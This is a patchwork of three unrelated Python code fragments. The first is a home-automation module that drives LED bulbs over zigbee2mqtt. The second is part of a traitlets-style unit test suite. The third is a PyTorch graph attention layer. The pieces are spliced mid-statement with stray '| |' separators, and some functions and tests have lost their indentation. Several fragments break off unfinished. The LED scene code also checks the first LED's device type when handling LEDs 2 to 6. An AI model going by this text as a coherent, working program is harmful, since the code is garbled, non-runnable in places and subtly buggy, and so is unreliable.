# TODO: allow getting dict as explicit value for an inner confclass.
# because you want to set some of its params and maybe load the | |
import math
import time
import threading
import json
from app import app
from app.database.database import *
from app.components.mqtt import MQTT_PUBLISH, CHECK_ZIGBEE2MQTT_SETTING
from app.components.email import SEND_EMAIL
""" ################### """
""" led basic functions """
""" ################### """
# This is based on original code from http://stackoverflow.com/a/22649803
# This is based on original code from http://stackoverflow.com/a/22649803
def RGBtoXY(r, g, b):
    """Convert 8-bit RGB channels to CIE xy chromaticity coordinates.

    Applies inverse sRGB companding to each normalized channel, converts to
    XYZ with the Wide-RGB-D65 matrix used by hue-style bulbs, and projects to
    (x, y) rounded to 3 decimals. Returns (0, 0) for pure black.
    """
    def gamma_expand(normalized):
        # Inverse sRGB companding: linearize the normalized channel value.
        if normalized > 0.04045:
            return math.pow((normalized + 0.055) / (1.0 + 0.055), 2.4)
        return normalized / 12.92

    linear = [gamma_expand(channel / 255.0) for channel in (r, g, b)]
    X = linear[0] * 0.649926 + linear[1] * 0.103455 + linear[2] * 0.197109
    Y = linear[0] * 0.234327 + linear[1] * 0.743075 + linear[2] * 0.022598
    Z = linear[0] * 0.000000 + linear[1] * 0.053077 + linear[2] * 1.035763
    total = X + Y + Z
    if total == 0:
        return (0, 0)
    return (round(X / total, 3), round(Y / total, 3))
def SET_LED_BULB_RGB(led_name, red, green, blue, brightness):
    """Switch an RGB bulb on via zigbee2mqtt with the given color and brightness."""
    x, y = RGBtoXY(int(red), int(green), int(blue))
    topic = "miranda/zigbee2mqtt/" + led_name + "/set"
    payload = '{"state":"ON","brightness":' + str(brightness) + ',"color": { "x":' + str(x) + ',"y":' + str(y) + '}}'
    MQTT_PUBLISH(topic, payload)
    # Give the bulb time to apply the setting before the next command.
    time.sleep(1)
def SET_LED_BULB_WHITE(led_name, color_temp, brightness):
    """Switch a tunable-white bulb on with the given color temperature and brightness."""
    topic = "miranda/zigbee2mqtt/" + led_name + "/set"
    payload = '{"state": "ON","brightness":' + str(brightness) + ',"color_temp":"' + str(color_temp) + '"}'
    MQTT_PUBLISH(topic, payload)
    # Give the bulb time to apply the setting before the next command.
    time.sleep(1)
def SET_LED_BULB_SIMPLE(led_name, brightness):
    """Switch a dimmable-only bulb on at the given brightness."""
    topic = "miranda/zigbee2mqtt/" + led_name + "/set"
    # NOTE(review): brightness is sent as a quoted JSON string here, unlike
    # SET_LED_BULB_RGB/WHITE -- preserved as-is; confirm devices accept both.
    payload = '{"state": "ON","brightness":"' + str(brightness) + '"}'
    MQTT_PUBLISH(topic, payload)
    time.sleep(1)
def SET_LED_BULB_BRIGHTNESS(led_name, brightness):
    """Set a bulb's brightness (payload is identical to SET_LED_BULB_SIMPLE)."""
    topic = "miranda/zigbee2mqtt/" + led_name + "/set"
    payload = '{"state": "ON","brightness":"' + str(brightness) + '"}'
    MQTT_PUBLISH(topic, payload)
    # Give the bulb time to apply the setting before the next command.
    time.sleep(1)
def SET_LED_BULB_TURN_OFF(led_name):
    """Switch a bulb off via zigbee2mqtt."""
    topic = "miranda/zigbee2mqtt/" + led_name + "/set"
    MQTT_PUBLISH(topic, '{"state": "OFF"}')
    # Give the bulb time to apply the setting before the next command.
    time.sleep(1)
""" ####################### """
""" led group check setting """
""" ####################### """
def CHECK_LED_GROUP_SETTING_THREAD(group_id, scene_id, scene, brightness, delay, limit):
    """Verify a group's setting in a background thread (non-blocking)."""
    # Fixed: the local was named `Thread`, shadowing threading.Thread.
    worker = threading.Thread(
        target=CHECK_LED_GROUP_SETTING_PROCESS,
        args=(group_id, scene_id, scene, brightness, delay, limit, ))
    worker.start()
def CHECK_LED_GROUP_SETTING_PROCESS(group_id, scene_id, scene, brightness, delay, limit):
    """Verify that a LED group reached the requested scene, retrying up to 3 times.

    Waits `delay` seconds before each verification attempt and stops early on
    success. The requested state/brightness is persisted afterwards regardless
    of confirmation (matching the original behavior); a warning is logged and
    e-mailed when the setting could not be confirmed.

    :return: the error list from the last verification attempt ([] = success)
    """
    if scene == "OFF":
        setting = '{"state":"OFF"}'
    else:
        setting = '{"state":"ON"}'
    # Up to three verification attempts; the triplicated copy-pasted retry
    # blocks of the original are collapsed into this loop.
    result = None
    for _attempt in range(3):
        time.sleep(delay)
        result = CHECK_LED_GROUP_SETTING(group_id, scene_id, setting, limit)
        if result == []:
            break
    # Persist the requested state even when unconfirmed (original behavior).
    SET_LED_GROUP_CURRENT_SETTING(group_id, scene)
    SET_LED_GROUP_CURRENT_BRIGHTNESS(group_id, brightness)
    group_name = GET_LED_GROUP_BY_ID(group_id).name
    if result == []:
        WRITE_LOGFILE_SYSTEM("SUCCESS", "LED | Group - " + group_name + " | Setting changed | " + str(scene) + " : " + str(brightness) + " %")
    else:
        WRITE_LOGFILE_SYSTEM("WARNING", "LED | Group - " + group_name + " | " + str(scene) + " : " + str(brightness) + " | " + str(result))
        SEND_EMAIL("WARNING", "LED | Group - " + group_name + " | " + str(scene) + " : " + str(brightness) + " | " + str(result))
    return result
def CHECK_LED_GROUP_SETTING(group_id, scene_id, setting, limit):
    """Check every LED of a group against the expected zigbee2mqtt setting.

    LED 1 is always checked against `setting`; LEDs 2..9 are checked only
    when active in the group -- against `setting` when their scene slot is
    active, otherwise against OFF. The eight copy-pasted per-LED blocks of
    the original are collapsed into a loop with identical call order
    (device lookup happens before the active check, as before).

    :return: list of error strings; [] means every setting was confirmed
    """
    if GET_GLOBAL_SETTING_VALUE("zigbee2mqtt") != "True":
        return ["Keine LED-Steuerung aktiviert"]
    error_list = []
    try:
        group = GET_LED_GROUP_BY_ID(group_id)
        # scene_id == 0 means "group offline": nothing to verify.
        if scene_id != 0:
            scene = GET_LED_SCENE_BY_ID(scene_id)
            # led 1 (always active, always follows the scene setting)
            led_1 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_1)
            if CHECK_ZIGBEE2MQTT_SETTING(led_1.name, setting, limit) == False:
                error_list.append(led_1.name + " >>> Setting not confirmed")
            # leds 2..9 (optional; inactive scene slots must report OFF)
            for index in range(2, 10):
                led = GET_MQTT_DEVICE_BY_IEEEADDR(getattr(group, "led_ieeeAddr_" + str(index)))
                if getattr(group, "active_led_" + str(index)) != "True":
                    continue
                if getattr(scene, "active_setting_" + str(index)) == "True":
                    expected = setting
                else:
                    expected = '{"state":"OFF"}'
                if CHECK_ZIGBEE2MQTT_SETTING(led.name, expected, limit) == False:
                    error_list.append(led.name + " >>> Setting not confirmed")
        return error_list
    except Exception as e:
        print(e)
        WRITE_LOGFILE_SYSTEM("ERROR", "LED | Start Scene | " + setting + " | " + str(e))
        SEND_EMAIL("ERROR", "LED | Start Scene | " + setting + " | " + str(e))
        return [str(e)]
""" ##################### """
""" led group functions """
""" ##################### """
def SET_LED_GROUP_SCENE(group_id, scene_id, brightness_global = 100):
if GET_GLOBAL_SETTING_VALUE("zigbee2mqtt") == "True":
try:
group = GET_LED_GROUP_BY_ID(group_id)
scene = GET_LED_SCENE_BY_ID(scene_id)
# led 1
led_1 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_1)
brightness_1 = scene.brightness_1*(brightness_global/100)
if led_1.device_type == "led_rgb":
SET_LED_BULB_RGB(led_1.name, scene.red_1, scene.green_1, scene.blue_1, int(brightness_1))
if led_1.device_type == "led_white":
SET_LED_BULB_WHITE(led_1.name, scene.color_temp_1, int(brightness_1))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_1.name, int(brightness_1))
# led 2
led_2 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_2)
if group.active_led_2 == "True":
if scene.active_setting_2 == "True":
brightness_2 = scene.brightness_2*(brightness_global/100)
if led_2.device_type == "led_rgb":
SET_LED_BULB_RGB(led_2.name, scene.red_2, scene.green_2, scene.blue_2, int(brightness_2))
if led_2.device_type == "led_white":
SET_LED_BULB_WHITE(led_2.name, scene.color_temp_2, int(brightness_2))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_2.name, int(brightness_2))
else:
SET_LED_BULB_TURN_OFF(led_2.name)
# led 3
led_3 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_3)
if group.active_led_3 == "True":
if scene.active_setting_3 == "True":
brightness_3 = scene.brightness_3*(brightness_global/100)
if led_3.device_type == "led_rgb":
SET_LED_BULB_RGB(led_3.name, scene.red_3, scene.green_3, scene.blue_3, int(brightness_3))
if led_3.device_type == "led_white":
SET_LED_BULB_WHITE(led_3.name, scene.color_temp_3, int(brightness_3))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_3.name, int(brightness_3))
else:
SET_LED_BULB_TURN_OFF(led_3.name)
# led 4
led_4 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_4)
if group.active_led_4 == "True":
if scene.active_setting_4 == "True":
brightness_4 = scene.brightness_4*(brightness_global/100)
if led_4.device_type == "led_rgb":
SET_LED_BULB_RGB(led_4.name, scene.red_4, scene.green_4, scene.blue_4, int(brightness_4))
if led_4.device_type == "led_white":
SET_LED_BULB_WHITE(led_4.name, scene.color_temp_4, int(brightness_4))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_4.name, int(brightness_4))
else:
SET_LED_BULB_TURN_OFF(led_4.name)
# led 5
led_5 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_5)
if group.active_led_5 == "True":
if scene.active_setting_5 == "True":
brightness_5 = scene.brightness_5*(brightness_global/100)
if led_5.device_type == "led_rgb":
SET_LED_BULB_RGB(led_5.name, scene.red_5, scene.green_5, scene.blue_5, int(brightness_5))
if led_5.device_type == "led_white":
SET_LED_BULB_WHITE(led_5.name, scene.color_temp_5, int(brightness_5))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_5.name, int(brightness_5))
else:
SET_LED_BULB_TURN_OFF(led_5.name)
# led 6
led_6 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_6)
if group.active_led_6 == "True":
if scene.active_setting_6 == "True":
brightness_6 = scene.brightness_6*(brightness_global/100)
if led_6.device_type == "led_rgb":
SET_LED_BULB_RGB(led_6.name, scene.red_6, scene.green_6, scene.blue_6, int(brightness_6))
if led_6.device_type == "led_white":
SET_LED_BULB_WHITE(led_6.name, scene.color_temp_6, int(brightness_6))
if led_1.device_type == | |
self.assertTrue(isinstance(a.inst, Foo))
a.inst = Bar()
self.assertTrue(isinstance(a.inst, Foo))
self.assertRaises(TraitError, setattr, a, 'inst', Foo)
self.assertRaises(TraitError, setattr, a, 'inst', Bar)
self.assertRaises(TraitError, setattr, a, 'inst', Bah())
def test_unique_default_value(self):
class Foo(object): pass
class A(HasTraits):
inst = Instance(Foo,(),{})
a = A()
b = A()
self.assertTrue(a.inst is not b.inst)
def test_args_kw(self):
class Foo(object):
def __init__(self, c): self.c = c
class Bar(object): pass
class Bah(object):
def __init__(self, c, d):
self.c = c; self.d = d
class A(HasTraits):
inst = Instance(Foo, (10,))
a = A()
self.assertEqual(a.inst.c, 10)
class B(HasTraits):
inst = Instance(Bah, args=(10,), kw=dict(d=20))
b = B()
self.assertEqual(b.inst.c, 10)
self.assertEqual(b.inst.d, 20)
class C(HasTraits):
inst = Instance(Foo, allow_none=True)
c = C()
self.assertTrue(c.inst is None)
def test_bad_default(self):
class Foo(object): pass
class A(HasTraits):
inst = Instance(Foo)
a = A()
with self.assertRaises(TraitError):
a.inst
def test_instance(self):
class Foo(object): pass
def inner():
class A(HasTraits):
inst = Instance(Foo())
self.assertRaises(TraitError, inner)
class TestThis(TestCase):
    """Tests for the This trait (self-referential instance trait)."""

    def test_this_class(self):
        """Bare `This` defaults to None and accepts instances of the declaring class."""
        class Foo(HasTraits):
            this = This
        owner = Foo()
        self.assertEqual(owner.this, None)
        other = Foo()
        owner.this = other
        self.assertEqual(owner.this, other)
        with self.assertRaises(TraitError):
            owner.this = 10

    def test_this_inst(self):
        """`This()` (an instance) also accepts instances of the declaring class."""
        class Foo(HasTraits):
            this = This()
        owner = Foo()
        owner.this = Foo()
        self.assertTrue(isinstance(owner.this, Foo))

    def test_subclass(self):
        """Subclass instances are valid in both directions for an inherited This."""
        class Foo(HasTraits):
            t = This()
        class Bar(Foo):
            pass
        parent, child = Foo(), Bar()
        parent.t = child
        child.t = parent
        self.assertEqual(parent.t, child)
        self.assertEqual(child.t, parent)

    def test_subclass_override(self):
        """Redeclaring This in a subclass narrows the accepted type to the subclass."""
        class Foo(HasTraits):
            t = This()
        class Bar(Foo):
            t = This()
        parent, child = Foo(), Bar()
        parent.t = child
        self.assertEqual(parent.t, child)
        with self.assertRaises(TraitError):
            child.t = parent

    def test_this_in_container(self):
        """This works as the element trait of a container."""
        class Tree(HasTraits):
            value = Unicode()
            leaves = List(This())
        tree = Tree(value='foo', leaves=[Tree('bar'), Tree('buzz')])
        with self.assertRaises(TraitError):
            tree.leaves = [1, 2]
class TraitTestBase(TestCase):
    """A base testing class for basic trait types.

    Subclasses set `obj` (a HasTraits instance with a `value` trait) and,
    optionally, `_default_value`, `_good_values` and `_bad_values`; the
    generic test methods below exercise assignment against those tables.
    """
    def assign(self, value):
        # Trigger the trait's validation by assigning to `value`.
        self.obj.value = value
    def coerce(self, value):
        # Identity by default; subclasses override to model trait coercion.
        return value
    def test_good_values(self):
        # Every good value must round-trip (modulo `coerce`).
        if hasattr(self, '_good_values'):
            for value in self._good_values:
                self.assign(value)
                self.assertEqual(self.obj.value, self.coerce(value))
    def test_bad_values(self):
        # Every bad value must raise TraitError on assignment.
        if hasattr(self, '_bad_values'):
            for value in self._bad_values:
                try:
                    self.assertRaises(TraitError, self.assign, value)
                except AssertionError:
                    # Re-fail with the offending value for easier debugging.
                    assert False, value
    def test_default_value(self):
        if hasattr(self, '_default_value'):
            self.assertEqual(self._default_value, self.obj.value)
    def test_allow_none(self):
        # Temporarily flip allow_none on and re-run the good/bad suites with
        # None moved from the rejected to the accepted side.
        if (hasattr(self, '_bad_values') and hasattr(self, '_good_values') and
            None in self._bad_values):
            trait=self.obj.traits()['value']
            try:
                trait.allow_none = True
                self._bad_values.remove(None)
                #skip coerce. Allow None casts None to None.
                self.assign(None)
                self.assertEqual(self.obj.value,None)
                self.test_good_values()
                self.test_bad_values()
            finally:
                #tear down: restore the trait config and the value tables.
                trait.allow_none = False
                self._bad_values.append(None)
    def tearDown(self):
        # restore default value after tests, if set
        if hasattr(self, '_default_value'):
            self.obj.value = self._default_value
class AnyTrait(HasTraits):
    # Fixture: a trait that accepts any value.
    value = Any
class AnyTraitTest(TraitTestBase):
    """Any: every value is valid; the default is None."""
    obj = AnyTrait()
    _default_value = None
    _good_values = [10.0, 'ten', u'ten', [10], {'ten': 10},(10,), None, 1j]
    _bad_values = []
class UnionTrait(HasTraits):
    # Fixture: Union of a Type trait and a Bool trait.
    value = Union([Type(), Bool()])
class UnionTraitTest(TraitTestBase):
    """Union accepts any value valid for either member trait."""
    obj = UnionTrait(value='ipython_genutils.ipstruct.Struct')
    _good_values = [int, float, True]
    _bad_values = [[], (0,), 1j]
class OrTrait(HasTraits):
    # Fixture: the `|` operator on traits builds a Union.
    value = Bool() | Unicode()
class OrTraitTest(TraitTestBase):
    obj = OrTrait()
    _good_values = [True, False, 'ten']
    _bad_values = [[], (0,), 1j]
class IntTrait(HasTraits):
    # Fixture: bounded Int (min=-100) with default 99.
    value = Int(99, min=-100)
class TestInt(TraitTestBase):
    obj = IntTrait()
    _default_value = 99
    _good_values = [10, -10]
    # -200 is rejected by the min=-100 bound; strings/floats never coerce.
    _bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None, 1j,
                   10.1, -10.1, '10L', '-10L', '10.1', '-10.1', u'10L',
                   u'-10L', u'10.1', u'-10.1', '10', '-10', u'10', -200]
    if not py3compat.PY3:
        _bad_values.extend([long(10), long(-10), 10*sys.maxint, -10*sys.maxint])
class LongTrait(HasTraits):
    # Fixture: Long trait (py2 `long` / py3 `int`).
    value = Long(99 if py3compat.PY3 else long(99))
class TestLong(TraitTestBase):
    obj = LongTrait()
    _default_value = 99 if py3compat.PY3 else long(99)
    _good_values = [10, -10]
    _bad_values = ['ten', u'ten', [10], {'ten': 10},(10,),
                   None, 1j, 10.1, -10.1, '10', '-10', '10L', '-10L', '10.1',
                   '-10.1', u'10', u'-10', u'10L', u'-10L', u'10.1',
                   u'-10.1']
    if not py3compat.PY3:
        # maxint undefined on py3, because int == long
        _good_values.extend([long(10), long(-10), 10*sys.maxint, -10*sys.maxint])
        _bad_values.extend([[long(10)], (long(10),)])
    @skipif(py3compat.PY3, "not relevant on py3")
    def test_cast_small(self):
        """Long casts ints to long"""
        self.obj.value = 10
        self.assertEqual(type(self.obj.value), long)
class IntegerTrait(HasTraits):
    # Fixture: Integer coerces small py2 longs to int.
    value = Integer(1)
class TestInteger(TestLong):
    """Reuses TestLong's value tables; values coerce through int()."""
    obj = IntegerTrait()
    _default_value = 1
    def coerce(self, n):
        return int(n)
    @skipif(py3compat.PY3, "not relevant on py3")
    def test_cast_small(self):
        """Integer casts small longs to int"""
        # Fixed: the inline `if py3compat.PY3: raise SkipTest(...)` was
        # unreachable -- the @skipif decorator already skips on py3.
        self.obj.value = long(100)
        self.assertEqual(type(self.obj.value), int)
class FloatTrait(HasTraits):
    # Fixture: Float with an upper bound (max=200.0).
    value = Float(99.0, max=200.0)
class TestFloat(TraitTestBase):
    obj = FloatTrait()
    _default_value = 99.0
    _good_values = [10, -10, 10.1, -10.1]
    # 201.0 violates the max bound; strings never coerce.
    _bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None,
                   1j, '10', '-10', '10L', '-10L', '10.1', '-10.1', u'10',
                   u'-10', u'10L', u'-10L', u'10.1', u'-10.1', 201.0]
    if not py3compat.PY3:
        _bad_values.extend([long(10), long(-10)])
class ComplexTrait(HasTraits):
    value = Complex(99.0-99.0j)
class TestComplex(TraitTestBase):
    """Complex accepts ints, floats and complex numbers."""
    obj = ComplexTrait()
    _default_value = 99.0-99.0j
    _good_values = [10, -10, 10.1, -10.1, 10j, 10+10j, 10-10j,
                    10.1j, 10.1+10.1j, 10.1-10.1j]
    _bad_values = [u'10L', u'-10L', 'ten', [10], {'ten': 10},(10,), None]
    if not py3compat.PY3:
        _bad_values.extend([long(10), long(-10)])
class BytesTrait(HasTraits):
    value = Bytes(b'string')
class TestBytes(TraitTestBase):
    """Bytes accepts bytes only; text (unicode) is rejected."""
    obj = BytesTrait()
    _default_value = b'string'
    _good_values = [b'10', b'-10', b'10L',
                    b'-10L', b'10.1', b'-10.1', b'string']
    _bad_values = [10, -10, 10.1, -10.1, 1j, [10],
                   ['ten'],{'ten': 10},(10,), None, u'string']
    if not py3compat.PY3:
        _bad_values.extend([long(10), long(-10)])
class UnicodeTrait(HasTraits):
    value = Unicode(u'unicode')
class TestUnicode(TraitTestBase):
    """Unicode accepts text; numbers and containers are rejected."""
    obj = UnicodeTrait()
    _default_value = u'unicode'
    _good_values = ['10', '-10', '10L', '-10L', '10.1',
                    '-10.1', '', u'', 'string', u'string', u"€"]
    _bad_values = [10, -10, 10.1, -10.1, 1j,
                   [10], ['ten'], [u'ten'], {'ten': 10},(10,), None]
    if not py3compat.PY3:
        _bad_values.extend([long(10), long(-10)])
class ObjectNameTrait(HasTraits):
    value = ObjectName("abc")
class TestObjectName(TraitTestBase):
    """ObjectName validates Python identifiers."""
    obj = ObjectNameTrait()
    _default_value = "abc"
    _good_values = ["a", "gh", "g9", "g_", "_G", u"a345_"]
    _bad_values = [1, "", u"€", "9g", "!", "#abc", "aj@", "a.b", "a()", "a[0]",
                   None, object(), object]
    if sys.version_info[0] < 3:
        _bad_values.append(u"þ")
    else:
        _good_values.append(u"þ")  # þ=1 is valid in Python 3 (PEP 3131).
class DottedObjectNameTrait(HasTraits):
    value = DottedObjectName("a.b")
class TestDottedObjectName(TraitTestBase):
    """DottedObjectName validates dotted import-path strings."""
    obj = DottedObjectNameTrait()
    _default_value = "a.b"
    _good_values = ["A", "y.t", "y765.__repr__", "os.path.join", u"os.path.join"]
    _bad_values = [1, u"abc.€", "_.@", ".", ".abc", "abc.", ".abc.", None]
    if sys.version_info[0] < 3:
        _bad_values.append(u"t.þ")
    else:
        # þ is a valid identifier character on Python 3 (PEP 3131).
        _good_values.append(u"t.þ")
class TCPAddressTrait(HasTraits):
    value = TCPAddress()
class TestTCPAddress(TraitTestBase):
    """TCPAddress validates (host, port) tuples."""
    obj = TCPAddressTrait()
    _default_value = ('127.0.0.1',0)
    _good_values = [('localhost',0),('192.168.0.1',1000),('www.google.com',80)]
    _bad_values = [(0,0),('localhost',10.0),('localhost',-1), None]
class ListTrait(HasTraits):
    value = List(Int)
class TestList(TraitTestBase):
    """List(Int): sequences of ints are accepted and coerced to list."""
    obj = ListTrait()
    _default_value = []
    _good_values = [[], [1], list(range(10)), (1,2)]
    _bad_values = [10, [1,'a'], 'a']
    def coerce(self, value):
        # Tuples coerce to lists on assignment.
        if value is not None:
            value = list(value)
        return value
class Foo(object):
    # Module-level fixture class (also referenced by dotted name below).
    pass
class NoneInstanceListTrait(HasTraits):
    value = List(Instance(Foo))
class TestNoneInstanceList(TraitTestBase):
    """List(Instance(Foo)): None elements are rejected by default."""
    obj = NoneInstanceListTrait()
    _default_value = []
    _good_values = [[Foo(), Foo()], []]
    _bad_values = [[None], [Foo(), None]]
class InstanceListTrait(HasTraits):
    # Instance given as a dotted string is resolved lazily to the Foo class.
    value = List(Instance(__name__+'.Foo'))
class TestInstanceList(TraitTestBase):
    obj = InstanceListTrait()
    def test_klass(self):
        """Test that the instance klass is properly assigned."""
        self.assertIs(self.obj.traits()['value']._trait.klass, Foo)
    _default_value = []
    _good_values = [[Foo(), Foo()], []]
    _bad_values = [['1', 2,], '1', [Foo], None]
class UnionListTrait(HasTraits):
    value = List(Int() | Bool())
class TestUnionListTrait(TraitTestBase):
    """List whose element trait is a Union built with `|`.

    Fixed: this previously subclassed HasTraits instead of TraitTestBase,
    so its value-table tests were never executed by the test runner.
    """
    obj = UnionListTrait()
    _default_value = []
    _good_values = [[True, 1], [False, True]]
    _bad_values = [[1, 'True'], False]
class LenListTrait(HasTraits):
    # Fixture: List with length bounds 1 <= len <= 2.
    value = List(Int, [0], minlen=1, maxlen=2)
class TestLenList(TraitTestBase):
    obj = LenListTrait()
    _default_value = [0]
    _good_values = [[1], [1,2], (1,2)]
    # [] and range(3) violate minlen/maxlen respectively.
    _bad_values = [10, [1,'a'], 'a', [], list(range(3))]
    def coerce(self, value):
        if value is not None:
            value = list(value)
        return value
class TupleTrait(HasTraits):
    # Fixture: fixed-length Tuple of one (nullable) Int.
    value = Tuple(Int(allow_none=True), default_value=(1,))
class TestTupleTrait(TraitTestBase):
    obj = TupleTrait()
    _default_value = (1,)
    _good_values = [(1,), (0,), [1]]
    _bad_values = [10, (1, 2), ('a'), (), None]
    def coerce(self, value):
        if value is not None:
            value = tuple(value)
        return value
    def test_invalid_args(self):
        self.assertRaises(TypeError, Tuple, 5)
        self.assertRaises(TypeError, Tuple, default_value='hello')
        # Must not raise: element traits plus a matching default are fine.
        t = Tuple(Int, CBytes, default_value=(1,5))
class LooseTupleTrait(HasTraits):
    # Fixture: Tuple given only a default -- no per-element validation.
    value = Tuple((1,2,3))
class TestLooseTupleTrait(TraitTestBase):
    obj = LooseTupleTrait()
    _default_value = (1,2,3)
    _good_values = [(1,), [1], (0,), tuple(range(5)), tuple('hello'), ('a',5), ()]
    _bad_values = [10, 'hello', {}, None]
    def coerce(self, value):
        if value is not None:
            value = tuple(value)
        return value
    def test_invalid_args(self):
        self.assertRaises(TypeError, Tuple, 5)
        self.assertRaises(TypeError, Tuple, default_value='hello')
        # Must not raise: element traits plus a matching default are fine.
        t = Tuple(Int, CBytes, default_value=(1,5))
class MultiTupleTrait(HasTraits):
    # Fixture: heterogeneous fixed-length Tuple (Int, Bytes); the list
    # default is coerced to a tuple.
    value = Tuple(Int, Bytes, default_value=[99,b'bottles'])
class TestMultiTuple(TraitTestBase):
    obj = MultiTupleTrait()
    _default_value = (99,b'bottles')
    _good_values = [(1,b'a'), (2,b'b')]
    _bad_values = ((),10, b'a', (1,b'a',3), (b'a',1), (1, u'a'))
class CRegExpTrait(HasTraits):
    value = CRegExp(r'')
class TestCRegExp(TraitTestBase):
    """CRegExp casts strings to compiled regex pattern objects."""
    def coerce(self, value):
        return re.compile(value)
    obj = CRegExpTrait()
    _default_value = re.compile(r'')
    _good_values = [r'\d+', re.compile(r'\d+')]
    # '(' is an invalid pattern; None and () are not regex-compilable.
    _bad_values = ['(', None, ()]
class DictTrait(HasTraits):
    """Fixture: a HasTraits class with an unvalidated Dict trait."""
    value = Dict()

def test_dict_assignment():
    """Assigning a dict stores the very same object (no copy on assignment)."""
    source = dict()
    holder = DictTrait()
    holder.value = source
    # Mutations of the assigned dict are visible through the trait.
    source['a'] = 5
    nt.assert_equal(source, holder.value)
    nt.assert_true(holder.value is source)
class ValidatedDictTrait(HasTraits):
    # `trait` validates all values; `traits` adds per-key validation.
    value = Dict(trait=Unicode(),
                 traits={'foo': Int()},
                 default_value={'foo': 1})
class TestInstanceDict(TraitTestBase):
    obj = ValidatedDictTrait()
    _default_value = {'foo': 1}
    _good_values = [{'0': 'foo', 'foo': 1}, {'1': 'bar', 'foo': 2}]
    # Non-unicode values and a non-int 'foo' entry must be rejected.
    _bad_values = [{'0': 0, 'foo': 1}, {'1': 'bar', 'foo': 'bar'}]
def test_dict_default_value():
    """Check that the `{}` default value of the Dict traitlet constructor is
    actually copied, so instances never share one mutable default dict."""
    class Foo(HasTraits):
        d1 = Dict()
        d2 = Dict()
    instance = Foo()
    nt.assert_equal(instance.d1, {})
    nt.assert_equal(instance.d2, {})
    nt.assert_is_not(instance.d1, instance.d2)
class TestValidationHook(TestCase):
def test_parity_trait(self):
"""Verify that the early validation hook is effective"""
class Parity(HasTraits):
value = Int(0)
parity = Enum(['odd', | |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
import math
class GraphConvolutionLayer(nn.Module):
    """
    Base graph convolution layer.

    Subclasses implement `_aggregate` (neighborhood aggregation) and
    `_update` (node-feature update); `forward` composes the two.
    """
    def __init__(self):
        super(GraphConvolutionLayer, self).__init__()

    def forward(self, feat, adj):
        """
        Aggregate-then-update template; can be overridden.

        :param feat: node feature tensor
        :param adj: adjacency tensor
        :return: updated node features
        """
        h_prime = self._aggregate(feat, adj)
        return self._update(feat, h_prime)

    def _aggregate(self, feat, adj):
        # Fixed: was print("Unimplemented!") silently returning None, which
        # would surface later as a confusing error; fail loudly instead.
        raise NotImplementedError

    def _update(self, feat, feat_prime):
        raise NotImplementedError
class BaseGraphAttentionLayer(GraphConvolutionLayer):
    """
    Base attention layer: aggregation = attention weights @ features.

    Subclasses implement `_attention` returning the weight matrix.
    """
    def __init__(self):
        super(BaseGraphAttentionLayer, self).__init__()

    def _attention(self, feat, adj):
        # Fixed: was print("Unimplemented!") returning None, which made
        # `_aggregate` fail later with an opaque matmul error; raise instead.
        raise NotImplementedError

    def _aggregate(self, feat, adj):
        """
        Attention-weighted aggregation; can be overridden.

        :param feat: node feature tensor
        :param adj: adjacency tensor
        :return: aggregated node features
        """
        weight = self._attention(feat, adj)
        h_prime = torch.matmul(weight, feat)
        return h_prime
class GraphAttentionLayer(BaseGraphAttentionLayer):
    """
    Simple GAT layer, similar to https://arxiv.org/abs/1710.10903

    :param in_features: size of each input node feature
    :param out_features: size of each output node feature
    :param dropout: dropout probability applied to the attention weights
    :param alpha: negative slope of the LeakyReLU on attention logits
    :param activation: optional activation applied to the aggregated output
    :param residual_connection: unused; kept for interface compatibility
    :param num_basis: unused; kept for interface compatibility
        (NOTE(review): the `True` default looks like a leftover -- confirm)
    """
    def __init__(self, in_features, out_features, dropout, alpha, activation,
                 residual_connection=False, num_basis=True):
        super(GraphAttentionLayer, self).__init__()
        self.dropout = dropout
        self.in_features = in_features
        self.out_features = out_features
        self.alpha = alpha
        # Shared linear transform W: (in_features, out_features).
        self.W = nn.Parameter(torch.zeros(size=(in_features, out_features), dtype=torch.float))
        nn.init.xavier_uniform_(self.W.data, gain=1.414)
        # Attention vector split into source (a_1) and target (a_2) halves.
        self.a_1 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
        nn.init.xavier_uniform_(self.a_1.data, gain=1)  # how to choose a proper gain number
        self.a_2 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
        nn.init.xavier_uniform_(self.a_2.data, gain=1)
        self.leakyrelu = nn.LeakyReLU(self.alpha)
        self.activation = activation

    def _attention(self, h, adj):
        # Pairwise logits e_ij = a_1·h_i + a_2·h_j via a broadcast add;
        # the permute implies batched input -- assumes h is (B, N, F),
        # TODO confirm against callers.
        logit_1 = torch.matmul(h, self.a_1)
        logit_2 = torch.matmul(h, self.a_2)
        logits = logit_1 + logit_2.permute(0, 2, 1)
        e = self.leakyrelu(logits)
        # Mask non-edges with a large negative so softmax ignores them.
        zero_vec = -9e15 * e.new_tensor([1., ])
        attention = torch.where(adj > 0, e, zero_vec)
        attention = F.softmax(attention, dim=-1)
        return attention

    def _aggregate(self, feat, adj):
        h = torch.matmul(feat, self.W)
        attention = self._attention(h, adj)
        attention = F.dropout(attention, self.dropout, training=self.training)
        h_out = torch.bmm(attention, h)
        return h_out

    def _update(self, feat, feat_prime):
        # Fixed: `!= None` -> `is not None`, and removed the unreachable
        # trailing `return feat_prime` after the if/else.
        if self.activation is not None:
            return self.activation(feat_prime)
        return feat_prime

    def forward(self, input, adj):
        # Same aggregate-then-update flow as the base class.
        h_prime = self._aggregate(input, adj)
        return self._update(input, h_prime)

    def extra_repr(self):
